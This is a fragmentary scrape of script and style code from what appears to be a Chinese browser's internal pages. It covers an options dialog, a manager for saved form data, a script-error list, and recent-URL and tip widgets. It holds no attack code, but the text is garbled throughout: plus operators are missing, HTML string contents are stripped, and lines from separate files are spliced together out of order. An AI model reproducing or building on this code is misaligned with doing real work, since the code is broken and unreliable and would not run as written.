If IsObject(parent.location) Then

url = parent.location.href

url = location.href

url = location

nPos = InStr( LCase(url), LCase(ArgName) )

tmpArgVal = right( url, len(url)-nPos 1 )

If InStr( url, "?" ) > 0 Then

ArrTmp = split( url, "?" )

if err.number <> 0 then

err.clear

strUrl = RequestQueryString( url, "url" )

strDomain = RequestQueryString( url, "domain" )

strErrName = RequestQueryString( url, "code" )

document.getElementById("googleSE").value = _neSearchEngine.google;

document.getElementById("baiduSE").value = _neSearchEngine.baidu;

var news = document.getElementById('news');

var frame = document.getElementById("newsFrame");

frame.src = "http://www.fjmjm.com/web/frame_naverror.html";

news.style.display='block';

el.className='a_e';

external.SetOptionValue(securityId,"option","ep_related","1");

news.style.display='none';

el.className='a_c';

external.SetOptionValue(securityId,"option","ep_related","0");

if(document.getElementById("news").currentStyle.display == "block")

this.setDisplay(false,el);

this.setDisplay(true,el);

var defValue = external.GetOptionValue(securityId,"option","ep_related");

this.setDisplay(true,document.getElementById("displayCtrl"));

window.attachEvent("onload",function(){

DisplayMgr.init();

.in1{width: 220px;}

return window.external.twGetFormByIndex( window, "", nIndex );

formName = window.external.twGetFormDataInfo( window, "", formID, dataName );

window.external.twSetFormDataInfo( window, "", formID, "tw_formName", formName );

window.external.twUnInitFormData( window, "", 0 );

pObj = window.event.srcElement;

pObj.style.color=_tabhottextcolor;

pObj.style.color=_tabtextcolor;

oTr = pObj.parentElement.parentElement.parentElement;

oTb = oTr.parentElement.parentElement;

formID = oTr.getAttribute( "tw_formID" );

window.external.twDeleteFormData( window, "", formID );

TalComForm.deleteRow(oTr.rowIndex);

window.location.reload();

oTr = pObj.parentElement.parentElement;

TalUserForm.deleteRow(oTr.rowIndex);

if( moreInfo.style.display == "none" ){

moreInfo.style.display = "";

moreImg.src="more2.gif";

moreInfo.style.display = "none";

moreImg.src="more1.gif";

colInput = formdatatable.getElementsByTagName("input");

nCount = colInput.length;

if( colInput[i].type != "button" )

colInput[i].value = "";

oTr = _oLastSel.parentElement;

if(formID.indexOf("twcommon_")!=-1){

window.external.twFormSave( window, "", formID );

formName = tw_formName.value;

formName = userformName.innerText;

oTr.cells[1].innerText = formName;

oTr = pObj.parentElement;

comDiv.style.display = "";

userDiv.style.display = "none";

tw_formName.value = formName;

window.external.twFormLoad( window, "", formID );

comDiv.style.display = "none";

userDiv.style.display = "";

var oTr = oTb.insertRow( -1 );

var oTd = oTr.insertCell( 0 );

var oTd1 = oTr.insertCell( 1 );

oTr.height = "32px";

oTd.width = "24";

oTd.style.cursor="pointer";

oTd.onclick=OnDeleteItem;

oTd.innerHTML = "
";

oTd1.style.cursor="pointer";

oTd1.onmouseleave=OnLeaveItem;

oTd1.onmouseenter=OnEnterItem;

oTd1.onclick=OnSelectCommonItem;

oTd1.style.color=_tabtextcolor;

oTd1.noWrap = true;

oTd1.innerText=formName;

oTr.setAttribute( "tw_formID", formID );

window.external.twAddComFormData( window, "" );

var nCount = _vCommonData.length;

SelectCommonItem( TalComForm.rows[nCount-1].cells[1] );

if( _oLastSel.parentElement != null )

_oLastSel.parentElement.bgColor = _tabItemDefColor;

_oLastSel.style.fontWeight = "normal";

_oLastSel.style.color = _tabtextcolor;

pObj.parentElement.bgColor = _tabItemSelColor;

pObj.style.fontWeight = "bold";

pObj.style.color = _tabSeltextcolor;

nCount = oTab.rows.length;

oTab.deleteRow(0);

formName = tw_getFormDataInfo( _vCommonData[i].id, "tw_formName" );

OnAddForm(TalComForm, formName, _vCommonData[i].id );

var nCount = _vUserData.length;

var oTr = TalUserForm.insertRow( -1 );

oTd.onclick=OnDeleteUserFormItem;

oTd.innerHTML = "";

oTd1.innerHTML="";

formName = tw_getFormDataInfo( _vUserData[i].id, "tw_formName" );

oTd1.childNodes[0].innerText = formName;

formUrl = tw_getFormDataInfo( _vUserData[i].id, "tw_form_url" );

oTd1.childNodes[0].href = formUrl;

oTr.setAttribute( "tw_formID", _vUserData[i].id );

oTr.bgColor = "#F5F5F5";

_vCommonData.splice( 0, _vCommonData.length );

_vUserData.splice( 0, _vUserData.length );

formObj.id = tw_getFormDataByIndex( nIndex );

if(formObj.id.indexOf("twcommon_")!=-1)

_vCommonData[_vCommonData.length] = formObj;

_vUserData[_vUserData.length] = formObj;

addForm.style.color = _tabtextcolor;

if( _vCommonData.length == 0 ){

if( _vCommonData.length > 0 )

pObj = TalComForm.rows[0].cells[1];

document.write( ""   _strWebSite   " | "  _strAboutPhoenix  " | "  _strThanks  "
" );

var _strLoginInfo="

var _strPassQues="

var _strPass="

var _strPassAnswer="

var _strWeb="

var _strWebSite = "

var _strWebSiteLink = "http://www.fjmjm.com";

var _strPhoenixLink = "http://www.fjmjm.com";

var _strThanksLink = "http://www.fjmjm.com";

Dim g_urlArray( 1024 ):Dim g_nCountVB:g_nCountVB = 0:Function SetArray( nIndex, strItem ):if nIdex < 1024 then:

g_urlArray( nIndex ) = strItem:

end if:End Function:Function OpenAllByVB( ):call window.external.twmutinavigate( window, "", g_urlArray(0), g_nCountVB ):End Function

g_strSecurityId = external.twGetSecurityID( window )

ret = external.twoption( g_strSecurityId, nID, bWrite, g_lValue, g_bstrValue1, g_bstrValue2, g_strArray(0), g_arraySize )

var oNewNode = document.createElement("LI");

header_btn.appendChild(oNewNode);

inFrame.document.write( "" );

inFrame.document.write( "" );

inFrame.document.write( "
" );

inFrame.document.write( "

" );
inFrame.document.body.leftMargin = 0;
inFrame.document.body.topMargin = 0;
inFrame.document.body.rightMargin = 0;
inFrame.document.body.bottomMargin = 0;
inFrame.document.body.marginwidth = 0;
inFrame.document.body.marginheight = 0;
function InsertInfoItemByHTML( nLine, nChar, nErrCode, strErrMsg, strErrUrl )
oHint.style.display="none";
infoTable = inFrame.window.oTa;
var oTr = infoTable.insertRow( -1 );
oColl = infoTable.rows;
if( oColl.length%2 )
oTr.bgColor = "#FFFFFF";
oTr.bgColor = "#F4FBFF";
strLine = strTemp.replace( "$ERR_TEMP", nLine );
strChar = strTemp.replace( "$ERR_TEMP", nChar );
strMSG = strTemp.replace( "$ERR_TEMP", strErrMsg );
strCode = strTemp.replace( "$ERR_TEMP", nErrCode );
strHTML = _strHTMLString.replace( "$ERR_LINE", strLine );
strHTML = strHTML.replace( "$ERR_CHAR", strChar );
strHTML = strHTML.replace( "$ERR_MSG", strMSG );
strHTML = strHTML.replace( "$ERR_CODE", strCode );
strHTML = strHTML.replace( "$ERR_URL", strErrUrl );
oTd.innerHTML = strHTML;
oTr.scrollIntoView(true);

document.write( "

"   _strExit   "

document.write( "

 "   _strBtnOK   "\

  "   _strBtnCancel   "" );

optionsTab.tabid = tabid;

optionsTab.tabname = tabname;

optionsTab.tabbgcolor = "#FFFFFF";

optionsTab.tabhotbgcolor = "#CDE3F5";

optionsTab.tabtextcolor = "#000000";

optionsTab.tabhottextcolor = "#FF5A00";

optionsTab.vSubTitleArray = new Array();

_vOptionTabsArray[_vOptionTabsArray.length] = optionsTab;

return optionsTab.vSubTitleArray;

tabSubTitle.titlename = titlename;

tabSubTitle.titleHelpLink = "";

tabSubTitle.vIA = new Array();

if ( arguments.length >= 3 )

tabSubTitle.titleHelpLink = titleHelpLink;

vSubTitleArray[vSubTitleArray.length] = tabSubTitle;

return tabSubTitle.vIA;

contextItem.itemID = itemID;

contextItem.itemIndex = -1;

contextItem.itemType = itemType;

contextItem.itemText = itemText;

contextItem.bItemChange = false;

contextItem.vAA = new Array();

contextItem.itemCode = "";

contextItem.itemAfterCode = "";

contextItem.itemPreCode = "";

contextItem.itemHelpLink = "";

if ( arguments.length >= 5 )

contextItem.itemPreCode = itemPreCode;

if ( arguments.length >= 6 )

contextItem.itemAfterCode = itemAfterCode;

if ( arguments.length >= 7 )

contextItem.itemCode = itemCode;

vIA[vIA.length] = contextItem;

contextItem.itemIndex = _vOIA.length;

_vOIA[_vOIA.length] = contextItem;

if ( "ckbedit" == itemType && "" != contextItem.itemCode )

contextItem.itemCode = contextItem.itemCode.replace( /#IDDEFINE/g, "id=item_edit_"   contextItem.itemIndex );

return contextItem.itemIndex;

radioBtn.btnText = btnText;

radioBtn.btnPreCode = "";

radioBtn.btnAfterCode = "";

radioBtn.vAA = new Array();

radioBtn.btnPreCode = btnPreCode;

if ( arguments.length >= 4 )

radioBtn.btnAfterCode = btnAfterCode;

var nIndex = vRadioArray.length;

tableList.tableRgnSize = tableRgnSize;

tableList.tableHeight = tableHeight;

tableList.vTopBtn = new Array();

tableList.vBottomBtn = new Array();

tableList.vHeader = new Array();

tableList.bHaveCheckBox = bChecked;

var vHeader = tableList.vHeader;

oHeader.headerText = headerText;

oHeader.headerWidth = headerWidth;

oHeader.bHidden = bHidden;

oHeader.headerText = "";

vHeader[ vHeader.length ] = oHeader;

var vBtn = tableList.vTopBtn;

vBtn = tableList.vBottomBtn;

oBtn.btnOpt = btnOpt;

oBtn.btnText = btnText;

vBtn[ vBtn.length ] = oBtn;

for ( var ix = 0; ix < _vOptionTabsArray.length; ix    )

document.write( "" );

document.write( "
" );

document.write( ""   _vOptionTabsArray[ix].tabname   "" );

for ( ix = 0; ix < _vOptionTabsArray.length; ix    )

if ( _SelectTabIndex == _vOptionTabsArray[ix].tabid )

if ( ix >= _vOptionTabsArray.length )

_SelectTabIndex = _vOptionTabsArray[0].tabid;

eval( "tabs_tr_"   _SelectTabIndex ).bgColor = _vOptionTabsArray[_SelectTabIndex].tabbgcolor;

eval( "tabs_table_"   _SelectTabIndex ).style.display = "none";

eval( "tabs_tr_"   _SelectTabIndex ).bgColor = _vOptionTabsArray[_SelectTabIndex].tabhotbgcolor;

eval( "tabs_table_"   _SelectTabIndex ).style.display = "";

divform_context.scrollTop = 0;

_vOIA[ nIndex ].bItemChange = true;

for ( var ix = 0; ix < vAA.length; ix    )

var itemType = _vOIA[ vAA[ix] ].itemType;

eval( "item_ckb_"   vAA[ix] ).disabled = bDisabled;

eval( "item_edit_"   vAA[ix] ).disabled = bDisabled;

oCheckBox.disabled = bDisabled;

eval( "item_edit_"   vAA[ix] ).disabled = ( oCheckBox.disabled || !oCheckBox.checked );

eval( "item_edit1_"   vAA[ix] ).disabled = bDisabled;

eval( "item_edit2_"   vAA[ix] ).disabled = bDisabled;

eval( "item_btn_"   vAA[ix] ).disabled = bDisabled;

var vRadioArray = _vOIA[ vAA[ix] ].itemCode;

for ( var radioIndex = 0; radioIndex < vRadioArray.length; radioIndex    )

eval( "item_radio_"   vAA[ix]   "["   radioIndex   "]" ).disabled = bDisabled;

eval( "item_list_"   vAA[ix] ).disabled = bDisabled;

eval( "item_textarea_"   vAA[ix] ).disabled = bDisabled;

if ( "ckb" == _vOIA[ nIndex ].itemType )

if ( !eval( "item_ckb_"   nIndex ).disabled )

bCheck = eval( "item_ckb_"   nIndex ).checked;

RealDoAssociate( _vOIA[ nIndex ].vAA, !bCheck, bRecursive );

else if ( "ckbedit" == _vOIA[ nIndex ].itemType )

eval( "item_edit_"   nIndex ).disabled = !bCheck;

else if ( "radio" == _vOIA[ nIndex ].itemType )

var vRadioArray = _vOIA[ nIndex ].itemCode;

var vAA = vRadioArray[ radioIndex ].vAA;

if ( !eval( "item_radioid_"   nIndex   radioIndex ).disabled )

bCheck = eval( "item_radioid_"   nIndex   radioIndex ).checked;

document.write( " "  _vOptionTabsArray[ix].tabname   " " );for ( var x = 0; x < _vOptionTabsArray[ix].vSubTitleArray.length; x    )
if ( "" != _vOptionTabsArray[ix].vSubTitleArray[x].titleHelpLink )
titleHelp = " ";
document.write( "
" );vIA = _vOptionTabsArray[ix].vSubTitleArray[x].vIA;
for ( var y = 0; y < vIA.length; y    )
var itemEnd = vIA[y].itemAfterCode   "";
if ( "" != vIA[y].itemHelpLink )
itemEnd = " "   vIA[y].itemAfterCode   "";
if ( "ckb" == vIA[y].itemType )
nRet = DoOption( vIA[y].itemID, false );
document.write( itemBegin   "
" );document.write( "
"   _vOptionTabsArray[ix].vSubTitleArray[x].titlename   ""   titleHelp   "
"   vIA[y].itemPreCode   ""   vIA[y].itemText   ""   itemEnd );eval( "item_ckb_"   vIA[y].itemIndex ).checked = Boolean( g_lValue );
eval( "item_ckb_"   vIA[y].itemIndex ).disabled = true;
else if ( "text" == vIA[y].itemType )
document.write( itemBegin   " "   vIA[y].itemPreCode   vIA[y].itemText   itemEnd );else if ( "edit" == vIA[y].itemType )
document.write( itemBegin   " "   vIA[y].itemPreCode   ""   itemEnd );eval( "item_edit_"   vIA[y].itemIndex ).value = g_bstrValue1;
eval( "item_edit_"   vIA[y].itemIndex ).disabled = true;
else if ( "ckbedit" == vIA[y].itemType )
document.write( itemBegin   " "   vIA[y].itemPreCode   ""   vIA[y].itemText   "" );if ( vIA[y].itemCode == "" )
document.write( "" );
document.write( vIA[y].itemCode );
document.write( itemEnd );
else if ( "quickaddr" == vIA[y].itemType )
document.write( itemBegin   " "   vIA[y].itemPreCode   ""   vIA[y].itemText   " "   vIA[y].itemCode   " 
"   itemEnd );eval( "item_edit1_"   vIA[y].itemIndex ).value = g_bstrValue1;
eval( "item_edit2_"   vIA[y].itemIndex ).value = g_bstrValue2;
eval( "item_edit1_"   vIA[y].itemIndex ).disabled = true;
eval( "item_edit2_"   vIA[y].itemIndex ).disabled = true;
else if ( "fileselect" == vIA[y].itemType )
document.write( itemBegin   " "   vIA[y].itemPreCode   vIA[y].itemText   " "   itemEnd );eval( "item_btn_"   vIA[y].itemIndex ).disabled = true;
else if ( "radio" == vIA[y].itemType )
var vRadioArray = vIA[y].itemCode;
document.write( itemBegin   " "   vIA[y].itemPreCode );document.write( vRadioArray[ radioIndex ].btnPreCode   ""   vRadioArray[radioIndex].btnText   ""   vRadioArray[ radioIndex ].btnAfterCode );
eval( "item_radio_"   vIA[y].itemIndex   "["   g_lValue   "]" ).checked = true;
for ( radioIndex = 0; radioIndex < vRadioArray.length; radioIndex    )
eval( "item_radio_"   vIA[y].itemIndex   "["   radioIndex   "]" ).disabled = true;
else if ( "list" == vIA[y].itemType )
document.write( itemBegin   " "   vIA[y].itemPreCode   vIA[y].itemText   ""   itemEnd );eval( "item_list_"   vIA[y].itemIndex ).selectedIndex = g_lValue;
eval( "item_list_"   vIA[y].itemIndex ).disabled = true;
else if ( "btn" == vIA[y].itemType )
document.write( itemBegin   " "   vIA[y].itemPreCode   ""   itemEnd );else if ( "textarea" == vIA[y].itemType )
document.write( itemBegin   " "   vIA[y].itemPreCode   ""   itemEnd );eval( "item_textarea_"   vIA[y].itemIndex ).value = g_bstrValue1;
eval( "item_textarea_"   vIA[y].itemIndex ).disabled = true;
else if ( "gesture" == vIA[y].itemType )
document.write( itemBegin   " "   vIA[y].itemPreCode   "" );document.write( ""   vIA[y].itemCode   "
" );
document.write( "" );document.write( "
" );
gesture_listsel.style.posWidth = 250;
var arrayID = g_strArray.toArray();
var arrayImg = g_strArray.toArray();
var arrayText = g_strArray.toArray();
document.write( "
" );document.write( "
" );eval( "gesture_seltext_"   arrayIndex ).innerHTML = " "   gesture_listsel.options[wHigh].value;
document.write( "
" );document.write( "  "   arrayText[arrayIndex]   " 
"   itemEnd );
else if ( "tablelist" == vIA[y].itemType )
var tableList = vIA[y].itemCode;
document.write( itemBegin   " "   vIA[y].itemPreCode   "" );document.write( "
" );document.write( "" );
document.write( "" );for ( var headerIndex = vHeader.length - 1; headerIndex >= 0; headerIndex -- )
if ( !vHeader[ headerIndex ].bHidden )
vHeader[ nLastNoHiddenHeader ].headerWidth  = 17;
for ( headerIndex = 0; headerIndex < vHeader.length; headerIndex    )
document.write( "
" );vHeader[ nLastNoHiddenHeader ].headerWidth -= 17;
document.write( "
"   vHeader[ headerIndex ].headerText   "
" );
document.write( "" );if( vIA[y].itemID == 2200 )
InsertSearchTableListRow( vIA[y].itemIndex, arrayIndex, g_strArray.getItem( arrayIndex ) );
InsertTableListRow( vIA[y].itemIndex, arrayIndex, g_strArray.getItem( arrayIndex ) );
document.write( "
" );var vTopBtn = tableList.vTopBtn;
for ( var btnIndex = 0; btnIndex < vTopBtn.length; btnIndex    )
document.write( "
" );
document.write( "" );
eval( "tablelist_"   vTopBtn[btnIndex].btnOpt   "_index"   vIA[y].itemIndex ).style.posWidth = 90;
eval( "tablelist_"   vTopBtn[btnIndex].btnOpt   "_index"   vIA[y].itemIndex ).disabled = true;
document.write( "
" );var vBottomBtn = tableList.vBottomBtn;
for ( btnIndex = 0; btnIndex < vBottomBtn.length; btnIndex    )
document.write( "" );
eval( "tablelist_"   vBottomBtn[btnIndex].btnOpt   "_index"   vIA[y].itemIndex ).style.posWidth = 90;
eval( "tablelist_"   vBottomBtn[btnIndex].btnOpt   "_index"   vIA[y].itemIndex ).disabled = true;
document.write( "
"   itemEnd );document.write( "
" );

for ( var ix = 0; ix < _vOIA.length; ix    )

var x1 = strItem.search( /:\^:/ );

strCol = strItem.substr( 0 );

strCol = strItem.substring( 0, x1 );

strItem = strItem.substr( x1   3 );

var searchUrl = varArray[2];

var searchKey = varArray[3];

var strTemp = strChecked   ":^:"   searchName   ":^:"   searchKey   ":^:"   searchUrl   ":^:"   searchHome;

var tableList = _vOIA[ nIndex ].itemCode;

var oTr = oTable.insertRow( nPos );

oTr.style.cursor = "default";

oTr.id = "tablelist_"   nIndex   "_item"   nPos;

oTr.onclick = OnTableListTrClick;

for ( var ix = 0; ix < vHeader.length; ix    )

var oTd = oTr.insertCell();

if( ix == 0 && tableList.bHaveCheckBox )

if ( vHeader[ix].bHidden )

oTd.innerHTML = "";;

oTd.innerHTML = strCol;

oTd.width = vHeader[ix].headerWidth;

oTd.style.wordWrap = "break-word";

nID = this.id;

var x1 = nID.search( /_.*_/ )   1;

var x2 = nID.search( /_item*/ );

var nIndex = nID.substring( x1, x2 );

var nItemIndex = nID.substr( x2   5 );

var nSelect = eval( "tablelist_select_"   nIndex ).value;

eval( "tablelist_"   nIndex   "_item"   nSelect ).bgColor = "#FFFFFF";

eval( nID ).bgColor = "#DFF4F8";

eval( "tablelist_select_"   nIndex ).value = nItemIndex;

var x1 = nID.search( /_*_/ )   1;

var x2 = nID.search( /_index*/ );

var btnOpt = nID.substring( x1, x2 );

var nIndex = nID.substr( x2   6 );

if ( -1 != oSelect.value )

oTable.deleteRow( oSelect.value );

for ( var ix = 0; ix < oTable.rows.length; ix    )

oTable.rows( ix ).id = "tablelist_"   nIndex   "_item"   ix;

if ( 0 == oTable.rows.length )

oSelect.value = -1;

else if ( oSelect.value >= oTable.rows.length )

oSelect.value --;

eval( "tablelist_"   nIndex   "_item"   oSelect.value ).bgColor = "#DFF4F8";

if ( -1 != ( Number( oSelect.value ) - 1 ) )

oTable.moveRow( oSelect.value, Number( oSelect.value ) - 1 );

oSelect.value = Number( oSelect.value ) - 1;

if ( Number( oSelect.value )   1 < ( oTable.rows.length ) )

oTable.moveRow( oSelect.value, Number( oSelect.value )   1 );

oSelect.value = Number( oSelect.value )   1;

DoAction( _vOIA[ nIndex ].itemID, 0 );

if( 2200 == _vOIA[ nIndex ].itemID )//

InsertSearchTableListRow( nIndex, oTable.rows.length, g_strActionParam );

InsertTableListRow( nIndex, oTable.rows.length, g_strActionParam );

var oTr = oTable.rows[ oSelect.value ];

g_strActionParam = oTr.cells[1].innerText   ":^:";

var col = oTr.cells[0].getElementsByTagName("input");

if(col[0].value == "on" )

g_strActionParam  = oTr.cells[3].innerText;

g_strActionParam  = oTr.cells[2].innerText;

for ( var ix = 4; ix < oTr.cells.length; ix    )

g_strActionParam  = oTr.cells[ix].innerText;

if ( Number( ix   1 ) != oTr.cells.length )

for ( var ix = 0; ix < oTr.cells.length; ix    )

if ( "" == oTr.cells[ix].innerText )

var col = oTr.cells[ix].getElementsByTagName( "input" );

g_strActionParam  = col[0].value;

DoAction( _vOIA[ nIndex ].itemID, 1 );

InsertSearchTableListRow( nIndex, oSelect.value, g_strActionParam );

InsertTableListRow( nIndex, oSelect.value, g_strActionParam );

for ( ix = 0; ix < _vOIA.length; ix    )

if ( "btn" == _vOIA[ix].itemType )

if ( _vOIA[ix].bItemChange )

if ( "ckb" == _vOIA[ix].itemType )

g_lValue = eval( "item_ckb_"   ix ).checked;

else if ( "edit" == _vOIA[ix].itemType )

g_bstrValue1 = eval( "item_edit_"   ix ).value;

else if ( "ckbedit" == _vOIA[ix].itemType )

else if ( "quickaddr" == _vOIA[ix].itemType )

g_bstrValue1 = eval( "item_edit1_"   ix ).value;

g_bstrValue2 = eval( "item_edit2_"   ix ).value;

else if ( "fileselect" == _vOIA[ix].itemType )

else if ( "radio" == _vOIA[ix].itemType )

var vRadioArray = _vOIA[ix].itemCode;

if ( eval( "item_radio_"   ix   "["   radioIndex   "]" ).checked )

else if ( "textarea" == _vOIA[ix].itemType )

g_bstrValue1 = eval( "item_textarea_"   ix ).value;

else if ( "list" == _vOIA[ix].itemType )

g_lValue = eval( "item_list_"   ix ).selectedIndex;

g_bstrValue1 = eval( "item_list_"   ix ).value;

else if ( "tablelist" == _vOIA[ix].itemType )

g_arraySize = oTable.rows.length;

var oTr = oTable.rows[x];

if( 2200 == _vOIA[ ix ].itemID )//

strItem = oTr.cells[1].innerText   ":^:";

if(col[0].checked == true )

strItem  = oTr.cells[3].innerText   ":^:";

strItem  = oTr.cells[2].innerText   ":^:";

for ( var y = 4; y < oTr.cells.length; y    )

strItem  = oTr.cells[y].innerText;

if ( Number( y   1 ) != oTr.cells.length )

for ( var y = 0; y < oTr.cells.length; y    )

if ( "" == oTr.cells[y].innerText )

var col = oTr.cells[y].getElementsByTagName( "input" );

strItem  = col[0].value;

var oTr = oTable.rows[0];

col[0].checked = true;

else if ( "gesture" == _vOIA[ix].itemType )

g_arraySize = gesture_table.rows.length;

var strItem = ( eval( "gesture_id_"   arrayIndex ).value & 0xffff ) | ( ( eval( "gesture_sel_"   arrayIndex ).value & 0xffff ) << 16 )

DoOption( _vOIA[ix].itemID, true );

_vOIA[ix].bItemChange = false;

external.twclosetab( window, "" );

Call external.twaction( window, nID, nCode, g_strActionParam )

var _strHelpLink = "http://www.fjmjm.com";

var _strHelpLinkRoot = "http://www.fjmjm.com/hl/cn/";

", "h1.1.htm" );

", "h1.2.htm" );

:8-256)" );

_vOIA[nIndex].vAA[0] = AddCI( vIA, 2402, "ckb", "

_vOIA[nIndex].vAA[0] = AddCI( vIA, 2102, "quickaddr", "Ctrl Enter       ", "", "
", "

_vOIA[nIndex].vAA[1] = AddCI( vIA, 2103, "quickaddr", "Shift Enter      ", "", "
", "

_vOIA[nIndex].vAA[2] = AddCI( vIA, 2104, "quickaddr", "Ctrl Shift Enter ", "", "
", "

_vOIA[nIndex].vAA[3] = AddCI( vIA, 2105, "quickaddr", "Ctrl Alt Enter", "", "
", "

AddCI( vIA, -1, "text", "

", "h2.htm#1" );

", "h3.1.htm" );

_vOIA[nIndex].vAA[0] = AddCI( vIA, 3302, "ckb", "

Windows2000

HTTPS

_vOIA[_vOIA[nIndex].vAA[0]].vAA[0] = AddCI( vIA, 3303, "radio", "", "", "
", vRadioArray );

_vOIA[nIndex].vAA[1] = AddCI( vIA, 3304, "ckb", "

nIndex=_vOIA[nIndex].vAA[1];

_vOIA[nIndex].vAA[0] = AddCI( vIA, 3305, "ckb", "

", "h3.2.htm" );

vRadioArray[2].vAA[0] = AddCI( vIA, 3203, "list", "

.torrent;.ram)

_vOIA[nIndex].vAA[0] = AddCI( vIA, 4003, "ckb", "

", "h4.htm#1" );

_vOIA[nIndex].vAA[0] = AddCI( vIA, 4102, "ckb", "

_vOIA[nIndex].vAA[1] = AddCI( vIA, 4103, "ckb", "

_vOIA[nIndex].vAA[2] = AddCI( vIA, 4104, "ckb", "

", "h4.htm#2" );

", "h4.1.htm" );

_vOIA[nIndex].vAA[0]=AddCI( vIA, 4403, "edit", "45", "

_vOIA[nIndex].vAA[1] = AddCI( vIA, 4402, "textarea", "", "", "
", "cols=\"70\" rows=\"12\"" );

www.fjmjm.com

_vOIA[nIndex].itemHelpLink = "h5.htm#1";

_vOIA[nIndex].vAA[0] = AddCI( vIA, 5007, "radio", "", "", "
", vRadioArray );

_vOIA[nIndex].itemHelpLink = "h5.htm#2";

_vOIA[nIndex].vAA[0] = AddCI( vIA, 5003, "ckb", "

_vOIA[nIndex].vAA[1] = AddCI( vIA, 5004, "ckb", "

_vOIA[nIndex].vAA[2] = AddCI( vIA, 5005, "ckb", "

_vOIA[nIndex].vAA[3] = AddCI( vIA, 5008, "ckb", "

", "h5.1.htm" );

_vOIA[nIndex].vAA[0] = AddCI( vIA, 5203, "fileselect", "

_vOIA[nIndex].vAA[1] = AddCI( vIA, 5204, "ckb", "

_vOIA[nIndex].vAA[2] = AddCI( vIA, 5205, "ckb", "

_vOIA[nIndex].vAA[3] = AddCI( vIA, 5206, "radio", "", "", "
", vRadioArray );

_vOIA[nIndex].vAA[0] = AddCI( vIA, 7002, "ckb", "Internet

_vOIA[nIndex].vAA[1] = AddCI( vIA, 7003, "ckb", "

_vOIA[nIndex].vAA[2] = AddCI( vIA, 7004, "ckb", "Cookies

_vOIA[nIndex].vAA[3] = AddCI( vIA, 7005, "ckb", "

_vOIA[nIndex].vAA[4] = AddCI( vIA, 7006, "ckb", "

_vOIA[nIndex].vAA[5] = AddCI( vIA, 7007, "ckb", "

_vOIA[nIndex].vAA[0] = AddCI( vIA, 7100, "ckb", "

_vOIA[nIndex].vAA[1] = AddCI( vIA, 7102, "btn", "

", "h8.htm#1" );

", "h8.htm#2" );

_vOIA[nIndex].itemHelpLink = "h8.htm#3";

", "" );

127.0.0.1:80@HTTP#

Vista/Windows7

Windows

XMLHttpRequest

_vOIA[nIndex].vAA[0] = AddCI( vIA, 9109, "ckb", "

a.overflowHide {overflow:hidden;text-overflow:ellipsis;white-space:nowrap; width: 95%;}

.white:hover {font-size:12px;text-decoration:none;color: #FF5A00}

.wrap {width:700px;padding-left:40;font-size:12px;}

.headwrap {width:100%;height:48;overflow:hidden;background-image:url(sztop2.gif);line-height: 40px;background-repeat:repeat-x;}

.header_l {text-indent:30px;width:309px;font-size:15px;color:#FFFFFF;font-weight:bold;float:left;background-image:url(sztop.gif);background-repeat:no-repeat;}

.header_r {height:48;float:right;}

.header_r ul {padding-right:20px;*padding-top:10px;}

.header_r ul li {float:left;}

.title_frame {width:100%;overflow:hidden;font-size:12px;font-weight:bold;color:#3399cc;margin-top:16px;}

.title_l {float:left;}

.title_r {float:right;font-weight:normal;}

.title_r A:link {font-size:12px;text-decoration:none;color: #3399cc}

.title_r A:visited {font-size:12px;text-decoration:none;color: #3399cc}

.title_r ul li {float:left;padding-left:20px;}

.separator {width:100%;height:1px;border-top:1px solid #b7d8ed;padding:0;margin:5 0 0 0;}

#qp_item ul li div a.overflowHide{margin-left:8px;height:16px;overflow:hidden;text-overflow:ellipsis;width:85%;}

#qp_item .addAddress {margin: 0 0 0 40;}

#url_item {width:100%;}

#url_item ul {float:left;width:100%;}

#url_item ul li {float:left;width:100%;height:32px;}

#url_item ul li a {;height:16px; margin-left: 8px;}

#url_item ul li img {height:16px;}

4-.NW

//twinfo.htm

:$ERR_MSG

:$ERR_CODE
URL:$ERR_URL";

//twpage.htm tp*

var _tpLastUrl = "

var _tpAddURL = '

var _message_noneURL = '

//navierr.htm

function twRS (str) {document.write(str);}

var tip_show, g_s_id = external.twGetSecurityID(window), isTpShow, _userPages;

var tTp = external.twGetDailyTips(g_s_id);

if(tTp && tTp.length)

isTpShow = true, tipText.innerHTML = tTp;

isTpShow = false, _id('topImg_3').style.filter = 'alpha(opacity=50)', endLine.style.display = 'inline', dailytips.style.display = 'none';

_id('topImg_3').style.filter = 'alpha(opacity='   (tip_show == '0' ? 50 : 99)   ')';

endLine.style.display = tip_show == '0' ? 'inline' : 'none', dailytips.style.display = tip_show == '0' ? 'none' : 'inline';

btn.innerHTML = "";

tip_show = external.getOptionValue(g_s_id, "twhome", "showtip"), Tipshow();

var url_loaded = 0, url_show = '', lastUrlName = [], lastUrl = [], ctLt = 0,

oldUrlName = [], oldUrl = [], ctOld = 0, twurldivTemp = document.createElement( "div" );

function tw_getUrlData(i, t){

return external.twgetlasturl(window, '', i, t ? 1 : 0);

external.twdeletelasturl(window, '', str_url = (t ? lastUrl : oldUrl)[num = Number(i)], t ? 0 : 1), (t ? lastUrl : oldUrl)[num] = "";

for(var i = 0; str_data = tw_getUrlData(i, 0); i   , ctLt   )

arr_temp = str_data.split(str_data.indexOf("**") != -1 ? "**" : "::"), lastUrl[i] = arr_temp[0], lastUrlName[i] = arr_temp[1];

for(var i = 0; str_data = tw_getUrlData(i, 1); i   , ctOld   )

arr_temp = str_data.split(str_data.indexOf("**") != -1 ? "**" : "::"), oldUrl[i] = arr_temp[0], oldUrlName[i] = arr_temp[1];

function URL_Openall(){

var lists = document.getElementById("url_item").getElementsByTagName("a");

for(var i=0;iSetArray(g_nCountVB  ,lists[i].href);
_userPages || (external.twclosetab(window,''));
function OnBodyKeydown () {
13 == event.keyCode && URL_Openall();
function Url_LoadItem() {
if(document.getElementById("lasturl").currentStyle.display=="none")
url_loaded = 1, strHTML = document.createElement('ul');
if (lastUrl.length oldUrl.length == 0)
return (url_show = '0', lasturl.style.display = 'none', _id('topImg_2').style.filter = 'alpha(opacity=50)');
if(i>lastUrl.length-1)candidate.push("" filter(lastUrlName[i]) "
");
while(availSize>=0 && j<=oldUrl.length-1){
candidate2.push("" filter(oldUrlName[j]) "
");
strHTML.innerHTML = candidate2.join("") candidate.join("");
url_item.appendChild(strHTML);
for(var i = 0, tA = _tag('a', strHTML); i < tA.length;i  ){
tA[i].className = tA[i].offsetWidth > 618 ? 'overflowHide' : '';
function Urlshow(){
_id('topImg_2').style.filter = 'alpha(opacity='   (url_show == '0' ? 50 : 99)   ')';
lasturl.style.display = url_show == "0" ? "none" : "inline";
url_loaded || Url_LoadItem();
function Url_showSwitch() {
